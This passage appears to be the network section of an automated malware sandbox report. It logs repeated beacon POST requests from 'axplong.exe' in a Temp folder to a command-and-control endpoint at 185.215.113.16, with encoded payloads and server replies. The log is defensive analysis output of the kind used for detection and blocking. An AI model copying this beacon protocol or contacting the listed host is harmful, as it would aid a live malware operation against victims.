                    Date: Thu, 26 Sep 2024 23:29:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:41.973299026 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:42.197624922 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.7 | 49742 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:42.306026936 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:43.004071951 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:43.004837990 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:43.229008913 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.7 | 49743 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:43.337554932 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:44.065453053 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:44.066224098 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:44.306499958 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.7 | 49744 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:44.415405035 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:45.108756065 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:45.110018969 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:45.394546986 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 01:29:45.621578932 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.7 | 49745 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:45.623291969 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:46.332021952 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:46.332782030 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:46.561079979 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.7 | 49746 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:46.680819035 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:47.392909050 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:47.393826008 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:47.619889021 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.7 | 49747 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:47.729902983 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:48.442359924 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:48.455399990 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:48.859441042 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.7 | 49748 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:48.979027033 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:49.678456068 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:49.679280043 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:49.902822971 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.7 | 49749 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:50.024514914 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:50.728672028 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:50.729564905 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:50.959990025 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.7 | 49750 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:51.090655088 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:51.789194107 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:51.794341087 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:52.018054008 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.7 | 49751 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:52.133939981 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:52.883769035 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:52.884602070 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:53.140917063 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.7 | 49752 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:53.259809971 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:53.964808941 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:53.965877056 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
